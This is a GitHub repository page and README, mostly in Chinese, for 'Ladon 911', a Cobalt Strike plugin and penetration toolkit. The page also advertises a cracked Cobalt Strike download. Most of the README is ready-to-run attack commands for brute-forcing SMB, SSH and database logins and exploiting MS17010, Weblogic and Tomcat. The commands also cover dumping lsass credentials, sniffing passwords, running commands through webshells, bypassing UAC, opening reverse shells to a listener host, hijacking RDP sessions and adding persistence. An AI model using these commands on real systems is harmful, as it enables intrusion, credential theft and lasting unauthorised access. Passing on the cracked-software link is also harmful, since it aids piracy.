https://github.com/k8gege/Aggressor

Ladon 911 for Cobalt Strike & Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp
https://github.com/k8gege/Aggressor

aggressor-scripts brute-force cobalt-strike k8cscan ladon osscan portscan scanner subdomain webscan

Last synced: 15 days ago
JSON representation

Ladon 911 for Cobalt Strike & Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp

• Host: GitHub
• URL: https://github.com/k8gege/Aggressor
• Owner: k8gege
• Created: 2019-10-18T15:31:32.000Z (over 4 years ago)
• Default Branch: master
• Last Pushed: 2022-07-28T15:12:42.000Z (almost 2 years ago)
• Last Synced: 2024-03-08T13:32:47.498Z (4 months ago)
• Topics: aggressor-scripts, brute-force, cobalt-strike, k8cscan, ladon, osscan, portscan, scanner, subdomain, webscan
• Homepage:
• Size: 17.8 MB
• Stars: 905
• Watchers: 24
• Forks: 188
• Open Issues: 16
• Metadata Files:
  • Readme: README.md
  • Changelog: Change.log

Lists

• awesome-stars - k8gege/Aggressor - `★955` Ladon 911 for Cobalt Strike & Cracked Download,Large Network Penetration Scanner, vulnerability / exploit / detection / MS17010 / password/brute-force/psexec/atexec/sshexec/webshell/smbexec/netcat/osscan/netscan/struts2Poc/weblogicExp (Others)

README

        
# Ladon 911 for Cobalt Strike

![](https://k8gege.github.io/k8img/Ladon/Dragon.jpg)

[![Author](https://img.shields.io/badge/Author-k8gege-blueviolet)](https://github.com/k8gege) 

[![Ladon](https://img.shields.io/badge/Ladon-911-yellowgreen)](https://github.com/k8gege/Aggressor) 

[![Bin](https://img.shields.io/badge/Aggressor-Bin-ff69b4)](https://github.com/k8gege/Aggressor/releases) 

[![GitHub issues](https://img.shields.io/github/issues/k8gege/Aggressor)](https://github.com/k8gege/Aggressor/issues) 

[![Github Stars](https://img.shields.io/github/stars/k8gege/Aggressor)](https://github.com/k8gege/Aggressor) 

[![GitHub forks](https://img.shields.io/github/forks/k8gege/Aggressor)](https://github.com/k8gege/Aggressor)

[![GitHub license](https://img.shields.io/github/license/k8gege/Aggressor)](https://github.com/k8gege/Aggressor)

[![Downloads](https://img.shields.io/github/downloads/k8gege/Aggressor/total?label=Release%20Download)](https://github.com/k8gege/Aggressor/releases/latest)

### Ladon For Cobalt Strike



### Cobalt Strike Cracked by k8gege

DownLoad: https://github.com/k8gege/Aggressor/releases/tag/cs

### Cobalt Strike  K8破解版

Cobalt Strike 4.4


Cobalt Strike 4.3


Cobalt Strike 3.13


Cobalt Strike 3.12


1.内置Windows版TeamServer.exe启动器

2.内置巨龙拉冬Ladon7.2中英文版插件

### 巨龙拉冬9.0: 让你的Cobalt Strike变成超级武器 

9.0插件获取：https://mp.weixin.qq.com/s/GQBXCX1fiSLi6gKY3M-JcA

#### 无图无真相

好了废话不多说上图，让我们看看Cobalt Strike 4.4巨龙拉冬插件功能

如果你熟悉Ladon命令的可以直接在Beacon上执行相应命令即可，如使用“Ladon GetID”命令查看目标机器名、机器ID、CPUID、硬盘ID、MAC地址等信息，主要用于区分一些大内网同名机器，或其它用途。若是你不熟悉可以使用右键菜单，为了方便新人或不太熟的人

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44.PNG)

如果不熟悉Ladon命令用法，也可以右键菜单，使用非常方便，只需选择模块填写目标参数如(IP、URL、域名、主机名、CIDR格式IP等)，即可加载对应模块扫描或探测你想获取的信息，如探测C段存在MS17010漏洞的机器。

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_9.PNG)

内网外网网络资产探测

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_2.PNG)

操作系统信息探测

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_3.PNG)

漏洞检测

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_4.PNG)

网络密码审计

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_5.PNG)

本机信息收集

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_6.PNG)

横向移动、远程执行

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_7.PNG)

权限提升、本地提权

![](http://k8gege.org/k8img/Ladon/cs/cs44/cs44_8.PNG)

### 程序简介

Ladon一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主机、域名列表扫描。7.0版本内置83个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息，漏洞检测包含MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列等，密码爆破12种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(wmiexe/psexec/atexec/sshexec/jspshell),Web指纹识别模块可识别75种（Web应用、中间件、脚本类型、页面类型）等，可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

### 使用文档

ID | 主题 |  URL 

-|-|-

0 | Ladon完整文档 | https://k8gege.org/Ladon

### DownLoad

New Version：https://k8gege.org/Download 


All Version: https://github.com/k8gege/Ladon/releases/

### 0.Cobalt Strike联动

![](https://github.com/k8gege/K8CScan/blob/master/Images/CobaltStrike.gif)

### 前言

本文仅是Ladon简单使用例子，Cobalt Strike或PowerShell版用法一致。

完整文档：http://k8gege.org/Ladon

### 资产扫描、指纹识别、服务识别、存活主机、端口扫描

##### 001 多协议探测存活主机 （IP、机器名、MAC地址、制造商）

Ladon 192.168.1.8/24 OnlinePC

##### 002 多协议识别操作系统 （IP、机器名、操作系统版本、开放服务）

Ladon 192.168.1.8/24 OsScan

##### 003 扫描存活主机

Ladon 192.168.1.8/24 OnlineIP

##### 004 ICMP扫描存活主机

Ladon 192.168.1.8/24 Ping

##### 005 扫描SMB漏洞MS17010 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 MS17010

##### 006 SMBGhost漏洞检测 CVE-2020-0796 （IP、机器名、漏洞编号、操作系统版本）

Ladon 192.168.1.8/24 SMBGhost

##### 007 扫描Web信息/Http服务

Ladon 192.168.1.8/24 WebScan

##### 008 扫描C段站点URL域名

Ladon 192.168.1.8/24 UrlScan

##### 009 扫描C段站点URL域名

Ladon 192.168.1.8/24 SameWeb

##### 010 扫描子域名、二级域名

Ladon baidu.com SubDomain

##### 011 域名解析IP、主机名解析IP

Ladon baidu.com DomainIP

Ladon baidu.com HostIP

##### 012 域内机器信息获取

Ladon AdiDnsDump 192.168.1.8 （Domain IP）

##### 013 扫描C段端口、指定端口扫描

Ladon 192.168.1.8/24 PortScan

Ladon 192.168.1.8 PortScan 80,445,3389

##### 014 扫描C段WEB以及CMS（75种Web指纹识别）

Ladon 192.168.1.8/24 WhatCMS

##### 015 扫描思科设备

Ladon 192.168.1.8/24 CiscoScan

Ladon http://192.168.1.8 CiscoScan

##### 016 枚举Mssql数据库主机 （数据库IP、机器名、SQL版本）

Ladon EnumMssql

##### 017 枚举网络共享资源 	（域、存活IP、共享路径）

Ladon EnumShare

##### 018 扫描LDAP服务器

Ladon 192.168.1.8/24 LdapScan

##### 019 扫描FTP服务器

Ladon 192.168.1.8/24 FtpScan

### 暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

密码爆破详解参考SSH：http://k8gege.org/Ladon/sshscan.html

##### 020 445端口 SMB密码爆破(Windows)

Ladon 192.168.1.8/24 SmbScan

##### 021 135端口 Wmi密码爆破(Windowns)

Ladon 192.168.1.8/24 WmiScan

##### 022 389端口 LDAP服务器、AD域密码爆破(Windows)

Ladon 192.168.1.8/24 LdapScan

##### 023 5985端口 Winrm密码爆破(Windowns)

Ladon 192.168.1.8/24 WinrmScan.ini

##### 024 445端口 SMB NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 SmbHashScan

##### 025 135端口 Wmi NTLM HASH爆破(Windows)

Ladon 192.168.1.8/24 WmiHashScan

##### 026 22端口 SSH密码爆破(Linux)

Ladon 192.168.1.8/24 SshScan

Ladon 192.168.1.8:22 SshScan

##### 027 1433端口 Mssql数据库密码爆破

Ladon 192.168.1.8/24 MssqlScan

##### 028 1521端口 Oracle数据库密码爆破

Ladon 192.168.1.8/24 OracleScan

##### 029 3306端口 Mysql数据库密码爆破

Ladon 192.168.1.8/24 MysqlScan

##### 030 7001端口 Weblogic后台密码爆破

Ladon http://192.168.1.8:7001/console WeblogicScan

Ladon 192.168.1.8/24 WeblogicScan

##### 031 5900端口 VNC远程桌面密码爆破

Ladon 192.168.1.8/24 VncScan

##### 032 21端口 Ftp服务器密码爆破

Ladon 192.168.1.8/24 FtpScan

##### 033 8080端口 Tomcat后台登陆密码爆破

Ladon 192.168.1.8/24 TomcatScan

Ladon http://192.168.1.8:8080/manage TomcatScan

##### 034 Web端口 401基础认证密码爆破

Ladon http://192.168.1.8/login HttpBasicScan

##### 035 445端口 Impacket SMB密码爆破(Windowns)

Ladon 192.168.1.8/24 SmbScan.ini

##### 036 445端口 IPC密码爆破(Windowns)

Ladon 192.168.1.8/24 IpcScan.ini

### 漏洞检测/漏洞利用/Poc/Exp

##### 037 SMB漏洞检测(CVE-2017-0143/CVE-2017-0144)

Ladon 192.168.1.8/24 MS17010

##### 038 Weblogic漏洞检测(CVE-2019-2725/CVE-2018-2894)

Ladon 192.168.1.8/24 WeblogicPoc

##### 039 PhpStudy后门检测(phpstudy 2016/phpstudy 2018)

Ladon 192.168.1.8/24 PhpStudyPoc

##### 040 ActiveMQ漏洞检测(CVE-2016-3088)

Ladon 192.168.1.8/24 ActivemqPoc

##### 041 Tomcat漏洞检测(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatPoc

##### 042 Weblogic漏洞利用(CVE-2019-2725)

Ladon 192.168.1.8/24 WeblogicExp

##### 043 Tomcat漏洞利用(CVE-2017-12615)

Ladon 192.168.1.8/24 TomcatExp

##### 044 Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)

Ladon 192.168.1.8/24 Struts2Poc

### FTP下载、HTTP下载

##### 045 HTTP下载

Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar

##### 046 Ftp下载 	

Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

### 加密解密(HEX/Base64)

##### 047 Hex加密解密

Ladon 123456 EnHex

Ladon 313233343536 DeHex

##### 048 Base64加密解密

Ladon 123456 EnBase64

Ladon MTIzNDU2 DeBase64

### 网络嗅探

##### 049 Ftp密码嗅探 	

Ladon FtpSniffer 192.168.1.5

##### 050 HTTP密码嗅探 	

Ladon HTTPSniffer 192.168.1.5

##### 051 网络嗅探	

Ladon Sniffer

### 密码读取

##### 052 读取IIS站点密码、网站路径

Ladon IISpwd

##### DumpLsass内存密码 	

Ladon DumpLsass

### 信息收集

##### 053 进程详细信息 	

Ladon EnumProcess

Ladon Tasklist

##### 054 获取命令行参数 	

Ladon cmdline

Ladon cmdline cmd.exe

##### 055 获取渗透基础信息 	

Ladon GetInfo

Ladon GetInfo2

##### 056 .NET & PowerShell版本 	

Ladon NetVer

Ladon PSver

Ladon NetVersion

Ladon PSversion

##### 057 运行时版本&编译环境 	

Ladon Ver

Ladon Version

### 远程执行(psexec/wmiexec/atexec/sshexec)

##### 445端口 PSEXEC远程执行命令（交互式）

net user \\192.168.1.8 k8gege520 /user:k8gege

Ladon psexec 192.168.1.8

psexec> whoami

nt authority\system

##### 058 135端口 WmiExec远程执行命令 （非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

##### 059 445端口 AtExec远程执行命令（非交互式）

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

##### 060 22端口 SshExec远程执行命令（非交互式）

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami

Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

##### 061 JspShell远程执行命令（非交互式）

Usage：Ladon JspShell type url pwd cmd

Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

#### 062 WebShell远程执行命令（非交互式）

```Bash

Usage：Ladon WebShell ScriptType ShellType url pwd cmd

Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami

Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami

Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

```

### 提权降权

##### 063 BypassUac 绕过UAC执行,支持Win7-Win10 	

Ladon BypassUac c:\1.exe

Ladon BypassUac c:\1.bat

##### 064 GetSystem 提权或降权运行程序 	

Ladon GetSystem cmd.exe

Ladon GetSystem cmd.exe explorer

##### 065 Runas 模拟用户执行命令 	

Ladon Runas user pass cmd

### 其它功能

##### 066 一键启用.net 3.5	

Ladon EnableDotNet

##### 067 获取内网站点HTML源码 	

Ladon gethtml http://192.168.1.1

##### 068 检测后门

Ladon CheckDoor

Ladon AutoRun

##### 069 获取本机内网IP与外网IP 	

Ladon GetIP

##### 070 一键迷你WEB服务器 	

Ladon WebSer 80

Ladon web 80

### 反弹Shell

##### 071 反弹TCP NC Shell

Ladon ReverseTcp 192.168.1.8 4444 nc

##### 072 反弹TCP MSF Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

##### 073 反弹TCP MSF MET Shell

Ladon ReverseTcp 192.168.1.8 4444 meter

##### 074 反弹HTTP MSF MET Shell

Ladon ReverseHttp 192.168.1.8 4444

##### 075 反弹HTTPS MSF MET Shell

Ladon ReverseHttps 192.168.1.8 4444

##### 076 反弹TCP CMD & PowerShell Shell

Ladon PowerCat -r 192.168.1.8 4444 cmd

Ladon PowerCat -r 192.168.1.8 4444 psh

##### 077 反弹UDP Cmd & PowerShell Shell

Ladon PowerCat -r 192.168.1.110 4444 cmd -u

Ladon PowerCat -r 192.168.1.8 4444 psh -u

##### 078 RDP桌面会话劫持（无需密码）

Ladon RDPHijack 3

Ladon RDPHijack 3 console

##### 079 OXID定位多网卡主机

Ladon 192.168.1.8/24 EthScan

Ladon 192.168.1.8/24 OxidScan

#### 080 查看用户最近访问文件

Ladon Recent

#### 081 添加注册表Run启动项

Ladon RegAuto Test c:\123.exe

#### 082 AT计划执行程序(无需时间)(system权限)

Ladon at c:\123.exe

Ladon at c:\123.exe gui

#### 083 SC服务加启动项&执行程序(system权限）

Ladon sc c:\123.exe

Ladon sc c:\123.exe gui

Ladon sc c:\123.exe auto ServerName

### 工具下载

历史版本: https://github.com/k8gege/Ladon/releases

### 最新版

最新版在小密圈：http://k8gege.org/Ladon/update.txt







## Stargazers over time

[![Stargazers over time](https://starchart.cc/k8gege/Aggressor.svg)](https://starchart.cc/k8gege/Aggressor)